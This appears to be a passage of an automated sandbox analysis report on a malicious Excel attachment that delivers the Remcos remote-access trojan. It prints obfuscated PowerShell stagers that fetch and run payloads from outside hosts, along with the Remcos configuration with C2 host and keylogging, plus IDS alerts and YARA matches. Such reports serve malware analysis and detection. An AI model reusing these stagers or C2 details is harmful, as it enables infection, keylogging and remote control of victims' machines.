CAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))", CommandLine: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICA
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3968, TargetFilename: C:\Users\user\AppData\Local\Temp\4lwehmwo.doj.ps1

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3968, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline", ProcessId: 4088, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3592, TargetFilename: C:\ProgramData\remcos\logs.dat
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:37:11.578912+020020241971A Network Trojan was detected38.240.44.980192.168.2.2249162TCP
                    2024-10-08T15:37:13.956502+020020241971A Network Trojan was detected38.240.44.980192.168.2.2249164TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:37:11.380454+020020244491Attempted User Privilege Gain192.168.2.224916238.240.44.980TCP
                    2024-10-08T15:37:13.956297+020020244491Attempted User Privilege Gain192.168.2.224916438.240.44.980TCP
                    2024-10-08T15:37:33.525308+020020244491Attempted User Privilege Gain192.168.2.224917138.240.44.980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:37:35.755627+020020204231Exploit Kit Activity Detected38.240.44.980192.168.2.2249172TCP
                    2024-10-08T15:37:51.566344+020020204231Exploit Kit Activity Detected38.240.44.980192.168.2.2249177TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:37:35.755627+020020204251Exploit Kit Activity Detected38.240.44.980192.168.2.2249172TCP
                    2024-10-08T15:37:51.566344+020020204251Exploit Kit Activity Detected38.240.44.980192.168.2.2249177TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:37:38.599226+020020365941Malware Command and Control Activity Detected192.168.2.2249173192.3.101.1849674TCP
                    2024-10-08T15:37:39.747307+020020365941Malware Command and Control Activity Detected192.168.2.2249174192.3.101.1849674TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:37:33.333724+020020490381A Network Trojan was detected207.241.227.242443192.168.2.2249166TCP
                    2024-10-08T15:37:49.665716+020020490381A Network Trojan was detected207.241.227.242443192.168.2.2249176TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:37:39.972588+020028033043Unknown Traffic192.168.2.2249175178.237.33.5080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "ugnrv.duckdns.org:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0BYJUE", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879514002.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.527567335.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879261278.0000000000895000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.879514002.0000000000901000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.880062392.0000000000D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: Maersk BL, IN & PL.xlsJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00404423 FreeLibrary,CryptUnprotectData,26_2_00404423
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,31_2_004338C8
                    Source: powershell.exe, 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_3b58dd67-a

                    Exploits

                    barindex
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407538 _wcslen,CoGetObject,31_2_00407538
                    Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49176 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.pdb source: powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.538241032.000007FE89A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539125948.000007FE89C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.553778518.000007FE89C33000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.pdbhP source: powershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ourcextyztp1socafxhnzza0gjsxcl1rkzsew0pyre0<get_properties>d__27dnlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodhslyep4awfbnyb1u8rbsntb38a4afohptd2mzqgvdnlib.dotnet.writerstartupstubsq8qss4llzhcnjexejoadnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparam<types>d__0dnlib.dotnet.writerchunklistbase`1dnlib.utilsextensions<>c__displayclass30_0my71kl4xinw8e0xtgingo2gyxb4x5fodyayfxiyuimgsfp4z9nb6ajq17hlidnlib.dotnetnativetypedqvnw84absj0xtxemlrqjaauyg4aua3luelovhtmdnlib.dotnet.mdrawenclogrow__staticarrayinittypesize=128dnlib.dotnet.pdb.dssisymunmanagednamespacednlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64<findinstanceconstructors>d__278dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefpl7hc44k8tmypzboczngs9nlmq4kc7siwyjgbn1tdnlib.dotnet.emitlocals8olzhtokwvp05p0orfdfv87ztvf26funczwwwmp0yywouezi2jtehxirrneptk0ous6nxa8xivpwsdnlib.dotneticontainsgenericparametergmomu1oytl08acv6tdidnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamewwgsmk4wix4ejl5ykka2`1wghn3k4rrx6pfkpondbuokole64rd75fllv6qs3sdnlib.dotnet.resourcesresourcereaderyhkxf8nmrqdnlulp3utaxues6n6rxrsppg8x1rdnlib.dotnetstrongnamepublickeyeebh3p4cnrtvnysgv8wgeqpdjq4cdumfgs2hf7wcsp3eeq4tfseo3d26puogdnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupshl4l9q6vqgb4ikhkpumiv6p8s6qg0nurku2q23vyaqi5ob0iq8dvtgp5nctmaypy4h11h8grbtua8krrncrt4hyas2kdq7jkhqwlptbh4azbqmwb4y4njxoza1bb4atp9drom8mhxvdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparertn4qulebpqyhdrqjwbgpgv5kieuydkct0jyhcgdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowopal2ms3ld2gvy1dayarch8bvsyhmmv6jwh2kkykrzd04r4lepbrvnli3avuen7v4rbcrfya3wvf79dnlib.dotnet.writermethodbodywriter<getrawrows>d__31dnlib.dotnetihasdeclsecuritydnlib.dotnet.pdb.dssisymunmanagedscopebnkxrvouyh2phcm06iqdvdhfh4ossggyoamut2vdnlib.dotnetimanagedentrypoint<findall>d__5<getextramonopaths>d__55startup_informationdtxtvs4som9sus7o6cfsihtl2w4svte7ike8ulm8fzfdxfxn29ope3g4hezuodoo3uknu3efqdlfv5iuhu0ouity2laa3vsgtdnlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderlvdvan4hx1ayggo4nkjqeoeb8q4hejf6qdb7pmrydnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparser<findall>d__9dnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatorqxap4g4atk84hqjqf60izbwobt4al65utclbbzhqdnlib.dotnet.resources